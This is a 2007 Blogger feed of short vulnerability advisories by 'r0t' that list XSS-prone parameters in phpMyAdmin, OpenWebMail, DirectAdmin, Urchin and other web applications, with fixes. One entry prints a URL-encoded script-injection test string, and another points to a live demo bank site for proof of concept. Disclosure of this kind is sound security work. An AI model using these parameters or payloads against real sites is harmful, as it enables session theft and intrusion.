rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/744264100584009894/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=744264100584009894' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/744264100584009894'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/744264100584009894'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/10/db-manager-xss-vuln.html' title='DB Manager XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-7730017980514315450</id><published>2007-10-07T17:54:00.000-07:00</published><updated>2007-10-07T17:56:18.899-07:00</updated><title type='text'>dbList XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 7 October 2007&lt;br /&gt;Vendor:http://www.livio.net/main/scripts.asp?file_id=24&lt;br /&gt;affected versions:dbList v8.1&lt;br /&gt;other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;dbList contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "table","db","strKeyWords","pagesize","sort" parameter isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-7730017980514315450?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/7730017980514315450/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=7730017980514315450' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7730017980514315450'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7730017980514315450'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/10/dblist-xss-vuln.html' title='dbList XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-7896200264802027612</id><published>2007-10-04T16:01:00.000-07:00</published><updated>2007-10-04T16:04:08.698-07:00</updated><title type='text'>Helm XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 4 October 2007&lt;br /&gt;Vendor:http://www.webhostautomation.com/&lt;br /&gt;affected versions:3.2.16&lt;br /&gt;other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Helm contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "showOption" parameter in "domain.asp",&lt;br /&gt;input passed to the "Folder" and "StartPath" parameter in "FileManager.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-7896200264802027612?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/7896200264802027612/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=7896200264802027612' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7896200264802027612'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7896200264802027612'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/10/helm-xss-vuln.html' title='Helm XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-695923318354058469</id><published>2007-10-01T08:27:00.000-07:00</published><updated>2007-10-01T08:29:16.950-07:00</updated><title type='text'>OdysseySuite™ Internet Banking vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 1 October 2007&lt;br /&gt;Vendor:http://www.megasol.se/odysseysuite.asp&lt;br /&gt;affected versions:current*&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;OdysseySuite™ contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "idkey" parameter in "Mailbox.mws" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;==============================================&lt;br /&gt;*Im not sure about vuln. version number.&lt;br /&gt;"OdysseySuite - Small Business Edition" current downloadable version is 4.0.729.&lt;br /&gt;&lt;br /&gt;for POC u can use demo:&lt;br /&gt;http://banking.megasol.se/Login.mws&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-695923318354058469?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/695923318354058469/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=695923318354058469' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/695923318354058469'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/695923318354058469'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/10/odysseysuite-internet-banking-vuln.html' title='OdysseySuite™ Internet Banking vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-2471787773851096001</id><published>2007-09-25T04:09:00.000-07:00</published><updated>2007-09-25T04:11:05.159-07:00</updated><title type='text'>Freeside XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 25 September 2007&lt;br /&gt;vendor:www.sisd.com&lt;br /&gt;affected versions:Freeside v1.7.2&lt;br /&gt;other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Freeside contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "failed" parameter in "search/cust_bill_event.cgi" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-2471787773851096001?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/2471787773851096001/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=2471787773851096001' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/2471787773851096001'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/2471787773851096001'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/09/freeside-xss-vuln.html' title='Freeside XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-6280016536827254944</id><published>2007-09-09T17:03:00.000-07:00</published><updated>2007-09-09T17:08:03.353-07:00</updated><title type='text'>DirectAdmin &lt;= v1.30.2 XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 10 September 2007&lt;br /&gt;vendor:http://www.directadmin.com/&lt;br /&gt;affected versions:v1.30.2 and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;DirectAdmin contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "user" parameter in "CMD_BANDWIDTH_BREAKDOWN" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Filter malicious characters and character sequences in a web proxy.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-6280016536827254944?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/6280016536827254944/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=6280016536827254944' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/6280016536827254944'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/6280016536827254944'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/09/directadmin-v1302-xss-vuln.html' title='DirectAdmin &lt;= v1.30.2 XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-2146513559990896000</id><published>2007-09-01T13:27:00.000-07:00</published><updated>2007-09-01T13:28:49.843-07:00</updated><title type='text'>Urchin 5.x Multiple XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 1 September 2007&lt;br /&gt;vendor:www.roirevolution.com/urchin/&lt;br /&gt;affected versions:tested on Urchin v5.6.00r2&lt;br /&gt;other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Urchin contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "dtc","vid","n","dt","ed","bd" parameter&lt;br /&gt;in "urchin.cgi" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-2146513559990896000?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/2146513559990896000/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=2146513559990896000' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/2146513559990896000'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/2146513559990896000'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/09/urchin-5x-multiple-xss-vuln.html' title='Urchin 5.x Multiple XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-4981894310147752412</id><published>2007-08-09T17:28:00.000-07:00</published><updated>2007-08-09T17:30:10.044-07:00</updated><title type='text'>Storesprite XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 10 August 2007&lt;br /&gt;vendor:http://www.storesprite.com/&lt;br /&gt;affected versions:Storesprite 7 and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Storesprite contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "next" parameter in "secure/addaddress.php","secure/editshipdetails.php","secure/register.php",&lt;br /&gt;"secure/login.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-4981894310147752412?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/4981894310147752412/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=4981894310147752412' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/4981894310147752412'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/4981894310147752412'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/08/storesprite-xss-vuln.html' title='Storesprite XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-3676478401728128500</id><published>2007-08-09T16:09:00.000-07:00</published><updated>2007-08-09T16:10:18.256-07:00</updated><title type='text'>phpMyAdmin multiple XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 10 August 2007&lt;br /&gt;vendor:http://www.phpmyadmin.net/&lt;br /&gt;affected versions:2.10.3 (latest stable version)&lt;br /&gt;prior versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;phpMyAdmin contains multiple flaws that allows a remote Cross-Site Scripting attacks.Input passed to the "unlim_num_rows","sql_query","pos" parameter in "tbl_export.php"&lt;br /&gt;and "session_max_rows","pos" parameter in "sql.php"  and "username" parameter in "server_privileges.php" and "sql_query" parameter in "main.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-3676478401728128500?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/3676478401728128500/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=3676478401728128500' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/3676478401728128500'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/3676478401728128500'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/08/phpmyadmin-multiple-xss-vuln.html' title='phpMyAdmin multiple XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-6345767393817152140</id><published>2007-08-06T14:29:00.001-07:00</published><updated>2007-08-06T14:29:50.719-07:00</updated><title type='text'>VisionProject Multiple XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 7 August 2007&lt;br /&gt;vendor:www.visionproject.se&lt;br /&gt;affected versions:VisionProject 3.1 and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;VisionProject contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "projectIssueId" parameter in "EditProjectIssue.do"&lt;br /&gt;and "projectId" parameter in "ProjectSelected.do"  and "folderId" parameter in "ProjectDocuments.do" and "sortField" parameter in "ProjectIssues.do" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-6345767393817152140?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/6345767393817152140/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=6345767393817152140' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/6345767393817152140'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/6345767393817152140'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/08/visionproject-multiple-xss-vuln.html' title='VisionProject Multiple XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-7312588710483529299</id><published>2007-08-06T08:51:00.000-07:00</published><updated>2007-08-06T08:52:31.552-07:00</updated><title type='text'>Snif XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 6 August 2007&lt;br /&gt;vendor:http://www.bitfolge.de/snif-en.html&lt;br /&gt;affected versions: Snif 1.5.2 and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Snif contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "path" and "download" parameter in "index.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-7312588710483529299?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/7312588710483529299/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=7312588710483529299' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7312588710483529299'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7312588710483529299'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/08/snif-xss-vuln.html' title='Snif XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-14208384555591151</id><published>2007-08-06T08:09:00.000-07:00</published><updated>2007-08-06T08:29:49.289-07:00</updated><title type='text'>Blogger AntiSpam</title><content type='html'>Hi Guys,&lt;br /&gt;We have already some monthes new blog and new domain, old one was pridels.blogspot.com wich was pretty nice archive , but aprox 1 month ago i get mail from Blogger about Anti Spam action and they had temporary disabled our old blog , after i reported to review our old blog some another "expert" , in 2 days i get answer with apologise, and that our blog is back.If you have visited  in last month  you had seen  nothing there just one  garbage post..and i saw also only that only after login i recognized that they changed domain name to  pridels0.blogspot.com,and its pitty , cauz i dont like that 0 and we lose our adress...&lt;br /&gt;I didnt wanted to write this with my bad english, but i was waiting more than 2 weeks to get any answer about  that problem.&lt;br /&gt;I just wanted to tell that you can find our old blog @ http:///pridels0.blogspot.com/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PS. Our board and maybe website from us will be back in september  @ pridels-team.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-14208384555591151?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/14208384555591151/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=14208384555591151' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/14208384555591151'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/14208384555591151'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/08/blogger-antispam.html' title='Blogger AntiSpam'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-4130404462159525870</id><published>2007-08-02T04:26:00.000-07:00</published><updated>2007-08-02T04:28:19.852-07:00</updated><title type='text'>OpenWebMail Multiple XSS  vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 2 August 2007&lt;br /&gt;vendor:openwebmail.org&lt;br /&gt;affected versions:2.52 20060831 and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;OpenWebMail contains  multiple flaws that allows a remote Cross-Site Scripting attacks.&lt;br /&gt;&lt;br /&gt;1. file "openwebmail-main.pl"&lt;br /&gt;&lt;br /&gt;Input passed to the "searchtype" and "longpage" and "page" parameter isn't properly sanitised before being returned to the user.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. file "openwebmail-prefs.pl"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Input passed to the:&lt;br /&gt;"prefs_caller",&lt;br /&gt;"userfirsttime",&lt;br /&gt;"page",&lt;br /&gt;"sort",&lt;br /&gt;"folder",&lt;br /&gt;"message_id"&lt;br /&gt;parameter isn't properly sanitised before being returned to the user.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. file "openwebmail-send.pl"&lt;br /&gt;&lt;br /&gt;Input passed to the:&lt;br /&gt;"compose_caller",&lt;br /&gt;"msgdatetype",&lt;br /&gt;"keyword",&lt;br /&gt;"searchtype",&lt;br /&gt;"folder",&lt;br /&gt;"page",&lt;br /&gt;"sort"&lt;br /&gt;parameter isn't properly sanitised before being returned to the user.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4. file "openwebmail-folder.pl"&lt;br /&gt;&lt;br /&gt;Input passed to the:&lt;br /&gt;"folder",&lt;br /&gt;"page",&lt;br /&gt;"sort"&lt;br /&gt;parameter isn't properly sanitised before being returned to the user.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5. file "openwebmail-webdisk.pl"&lt;br /&gt;&lt;br /&gt;Input passed to the:&lt;br /&gt;"searchtype",&lt;br /&gt;"page",&lt;br /&gt;"filesort",&lt;br /&gt;"singlepage",&lt;br /&gt;"showhidden",&lt;br /&gt;"showthumbnail",&lt;br /&gt;"message_id"&lt;br /&gt;parameter isn't properly sanitised before being returned to the user.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;6. file "openwebmail-advsearch.pl"&lt;br /&gt;&lt;br /&gt;Input passed to the "folder" parameter isn't properly sanitised before being returned to the user.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;7. file "openwebmail-abook.pl"&lt;br /&gt;&lt;br /&gt;Input passed to the:&lt;br /&gt;&lt;br /&gt;"abookcollapse",&lt;br /&gt;"abooksearchtype",&lt;br /&gt;"abooksort",&lt;br /&gt;"abooklongpage",&lt;br /&gt;"abookpage",&lt;br /&gt;"message_id",&lt;br /&gt;"searchtype",&lt;br /&gt;"msgdatetype",&lt;br /&gt;"sort",&lt;br /&gt;"page",&lt;br /&gt;"rootxowmuid",&lt;br /&gt;"listviewmode"&lt;br /&gt;parameter isn't properly sanitised before being returned to the user.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;Note:&lt;br /&gt;For manual testing use:&lt;br /&gt;%22%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-4130404462159525870?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/4130404462159525870/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=4130404462159525870' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/4130404462159525870'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/4130404462159525870'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/08/openwebmail-multiple-xss-vuln.html' title='OpenWebMail Multiple XSS  vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-9202681383901959597</id><published>2007-08-01T11:03:00.000-07:00</published><updated>2007-08-01T11:04:05.804-07:00</updated><title type='text'>OpenRat  vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 1 August 2007&lt;br /&gt;vendor:www.openrat.de&lt;br /&gt;affected versions:OpenRat CMS 0.8-beta1 and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;OpenRat contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "subaction" and "action" parameter in "index.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;bonus:&lt;br /&gt;&lt;br /&gt;by testing "action" parameter attacker will get full path disclosure.&lt;br /&gt;&lt;br /&gt;If you can log in, you can check also "id" parameter for SQL injection.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br 